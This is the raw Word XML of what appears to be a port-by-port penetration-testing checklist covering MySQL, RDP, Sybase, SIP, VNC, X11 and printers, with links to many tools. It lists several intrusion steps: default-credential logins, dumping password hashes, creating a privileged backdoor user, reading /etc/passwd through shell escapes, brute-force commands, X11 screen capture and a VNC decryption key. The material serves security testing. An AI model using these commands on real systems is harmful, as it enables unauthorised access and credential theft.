    <w:p w14:paraId="628DBB1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To check for other DB's -- show databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724EEA58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Administration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58812A6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MySQL Network Scanner</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E43A12E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MySQL GUI Tools</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="338B48A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mysqlshow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016F6B6B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mysqlbinlog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A788A31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Manual Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5A349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Default usernames and passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A18D4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username: root password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B64A1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testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74453802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 -h &lt;Hostname&gt; -u root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8294E6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 -h &lt;Hostname&gt; -u root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1296EBE3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 -h &lt;Hostname&gt; -u root@localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E41D03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 -h &lt;Hostname&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4439C2BF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 -h &lt;Hostname&gt; -u ""@localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F0FE3D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Configuration Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165656B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Operating System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094A256B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windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8A396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config.ini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC94C2E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my.ini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7C753A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windows\my.ini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A9F6DA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winnt\my.ini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6FFFA9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&lt;InstDir&gt;/mysql/data/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AFB08B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unix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0414762D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my.cnf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2006603C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/etc/my.cnf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA6A701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/etc/mysql/my.cnf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27619699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/var/lib/mysql/my.cnf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DB3F20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~/.my.cnf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27119CC5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/etc/my.cnf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B80BD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Command History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ABA5A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~/.mysql.history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FFC4D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Log Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3095DA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connections.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F182D2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update.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403475BA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common.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3795265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To run many sql commands at once -- mysql -u username -p &lt; manycommands.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEC427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 data directory (Location specified in my.cnf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BF139E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Parent dir = data directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E607163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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EAA666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test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FE832D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information_schema (Key information in MySQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FB3363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Complete table list -- select table_schema,table_name from tables;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEF0EDD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Exact privileges -- select grantee, table_schema, privilege_type FROM schema_privileges;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071A3371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File privileges -- select user,file_priv from mysql.user where user='root';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133432F8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Version -- select version();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5494216B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Load a specific file -- SELECT LOAD_FILE('FILENAME');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D2F11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SSL Check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2477FCCA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 show variables like 'have_openssl';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A298768" w14:textId="17CB539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If there's no rows returned at all it means the</w:t>
      </w:r>
      <w:r w:rsidR="006A295D">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cstheme="minorHAnsi"/>
          <w:color w:val="330066"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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 xml:space="preserve">distro itself doesn't support SSL connections and probably needs to be recompiled. If </w:t>
      </w:r>
      <w:r w:rsidR="006A295D" w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cstheme="minorHAnsi"/>
          <w:color w:val="330066"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>it</w:t>
      </w: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 xml:space="preserve"> disabled it means that the service just wasn't started with ssl and can be easily fixed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163C793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Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290259E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Current Level of access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3F5ACA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mysql&gt;select user();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8AE4DA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mysql&gt;select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7A677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Access passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E146FC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 use mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416CEED7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 select user,password from user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1377E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Create a new user and grant him privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EBFC44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mysql&gt;create user test identified by 'test';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C396F47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 grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726EE7EF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Break into a shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C4A074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 \! cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494C59E2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mysql&gt; \! bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1121017B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SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A427F03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mysql-miner.pl</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="240F59D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mysql-miner.pl http://target/ expected_string database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF5D54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http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21041EFF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http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3625EF95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References.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686503E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Design Weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065316B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MySQL running as root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9B895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Exposed publicly on Internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F0385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http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAEB08E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http://search.securityfocus.com/swsearch?sbm=%2F&amp;metaname=alldoc&amp;query=mysql&amp;x=0&amp;y=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B82BF3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4" w:name="_Toc96705562"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>RDesktop port 3389 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="4F7AE67D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Rdesktop Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E921C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Remote Desktop Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C0A282" w14:textId="0F18596B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Rdes</w:t>
      </w:r>
      <w:r w:rsidR="006A295D">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cstheme="minorHAnsi"/>
          <w:color w:val="330066"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>k</w:t>
      </w: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top Bruteforce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1327345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TSGrinder</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="620EA7C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tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67480291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7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Tscrack</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50975D20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5" w:name="_Toc96705563"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Sybase Port 5000+ open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="59DC7668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Sybase Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B74F31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sybase-version ip_address from NGS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0865FBB9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Sybase Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B76917E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Use DBVisualiser</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1EB86BD6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Sybase Security checksheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="240DBB26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Copy output into excel spreadsheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD16271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Evaluate mis-configured parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BA676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Manual sql input of previously reported vulnerabilties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1D0EBE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Advanced SQL Injection in SQL Server</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5BCB5754" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="00AE180D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More Advanced SQL Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="22E21639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NGS Squirrel for Sybase</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="567B40FA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6" w:name="_Toc96705564"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SIP Port 5060 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="5178A078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SIP Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB0F9C8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netcat</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F6B2D7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nc IP_Address Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBD31AE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sipflanker</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E27EA9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python sipflanker.py 192.168.1-254</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6002A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Sipscan</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A53231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smap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72767322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smap IP_Address/Subnet_Mask</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452BE5A0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smap -o IP_Address/Subnet_Mask</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4014F1C8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smap -l IP_Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8C6A82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SIP Packet Crafting etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDEE9C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sipsak</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61BC189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Tracing paths: - sipsak -T -s sip:usernaem@domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08083ED6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Options request:- sipsak -vv -s sip:username@domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5F5363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Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470EC6EB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89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siprogue</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1CF209ED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SIP Vulnerability Scanning/ Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7399CD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0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tftp bruteforcer</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="49DFF2A3" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="00AE180D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1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Default dictionary file</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F6C34A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./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652CB18C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2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VoIPaudit</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7EA4419D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3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SiVuS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E762A9A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164D5ED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SIPDefault.cnf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313C328D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asterisk.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6C19E5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sip.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672A5BC0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phone.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0ED4CD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sip_notify.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5706A69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&lt;Ethernet address&gt;.cfg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353110A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000000000000.cfg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365963F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phone1.cfg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5CA72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sip.cfg etc. etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6385C515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7" w:name="_Toc96705565"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>VNC port 5900^ open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="1DE693C4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VNC Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BF979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Scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E26C649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5900^ for direct access.5800 for HTTP access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509196DD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VNC Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C558CE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Password Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790B53FB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Remote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A1AAE9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Password Guess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2687AF" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="00AE180D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4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vncrack</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="143012A7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Password Crack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13484E7D" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="00AE180D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5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vncrack</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="57F7BF44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Packet Capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567173D6" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="008C6E63" w:rsidP="008C6E63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Phosshttp://www.phenoelit.de/phoss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5975B44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Local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1392ECD4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Registry Locations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0694485A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\HKEY_CURRENT_USER\Software\ORL\WinVNC3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A8552E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\HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D866D5" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="008C6E63" w:rsidP="008C6E6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Decryption Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EDB7CB" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="008C6E63" w:rsidP="008C6E63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0x238210763578887</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB0D7DA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Exmine Configuration Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5593F8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.vnc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701A7FC3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/etc/vnc/config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A4408B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$HOME/.vnc/config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4CF32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/etc/sysconfig/vncservers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161822A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/etc/vnc.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F5A567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8" w:name="_Toc96705566"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>X11 port 6000^ open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="08D72043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X11 Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFD5486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List open windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A07CA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Authentication Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDA388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Xauth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB77F9E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Xhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A78B71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X11 Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9D4CF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xwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769F3EB4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xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5635737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Keystrokes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9B10EA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Received</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E4D0CC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Transmitted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732B229C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Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DBA83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xhost +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD13565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Examine Configuration Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFA67B7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/etc/Xn.hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A69B36A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/usr/lib/X11/xdm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7414E4D6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Search through all files for the command "xhost +" or "/usr/bin/X11/xhost +"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609BE532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/usr/lib/X11/xdm/xsession</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B487F4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/usr/lib/X11/xdm/xsession-remote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D07ED9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/usr/lib/X11/xdm/xsession.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309F1131" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="008C6E63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/usr/lib/X11/xdm/xdm-config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61634DC7" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="008C6E63" w:rsidP="008C6E6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DisplayManager*authorize:on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ABC859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29" w:name="_Toc96705567"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Tor Port 9001, 9030 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="0E31DE3E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Tor Node Checker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A27B72F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6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Ip Pages</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50AB4490" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="00AE180D" w:rsidP="008C6E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7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Kewlio.net</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="557234E2" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="008C6E63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r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cstheme="minorHAnsi"/>
          <w:color w:val="330066"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap NSE script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1963A383" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="008C6E63" w:rsidP="006A295D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc96705568"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Jet Direct 9100 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="1E84912A" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="00AE180D" w:rsidP="008C6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theme="minorHAnsi"/>
          <w:color w:val="330066"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId198" w:history="1">
        <w:r w:rsidR="008C6E63" w:rsidRPr="006A295D">
          <w:rPr>
            <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cstheme="minorHAnsi"/>
            <w:color w:val="330066"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>hijetta</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="335FB07A" w14:textId="77777777" w:rsidR="00151770" w:rsidRPr="006A295D" w:rsidRDefault="00AE180D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00151770" w:rsidRPr="006A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5D15"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5AB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63"/>
    <w:rsid w:val="006A295D"/>
    <w:rsid w:val="008C6E63"/>
    <w:rsid w:val="00997C80"/>
    <w:rsid w:val="00AE180D"/>
    <w:rsid w:val="00B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8BF9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8AFCAA33-07C1-472F-8892-DC454E02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C6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E6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C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6E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E6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C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180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E180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E180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.archive.org/web/20200309204648/http:/www.foofus.net/jmk/medusa/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.hoobie.net/brutus/" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/examples.oreilly.com/networksa/tools/put.pl" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.woany.co.uk/" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/oss.coresecurity.com/impacket/rpcdump.py" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.woany.co.uk/oracsec/" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.red-database-security.com/" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.vulnerabilityassessment.co.uk/passwordsC.htm" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.hackingvoip.com/tools/tftp_bruteforce.txt" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.nta-monitor.com/ike-scan/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/freeworld.thc.org/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/chrispederick.com/work/web-developer/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/packetstormsecurity.org/filedesc/cms_few.py.txt.html" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.isecpartners.com/files/iSEC_Scott_Stender_Blind_Security_Testing.bh07.pdf" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/freeworld.thc.org/" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.integrigy.com/security-resources/downloads/lsnrcheck-tool/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/freeworld.thc.org/" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.solarwinds.net/Download-Tools.htm" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.toolcrypt.org/index.html" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.windowsecurity.com/whitepaper/Guide_to_Sybase_Security.html" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.sensepost.com/" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.webdav.org/cadaver/" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.parosproxy.org/index.shtml" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.cqure.net/wp/?page_id=33" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.red-database-security.com/" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 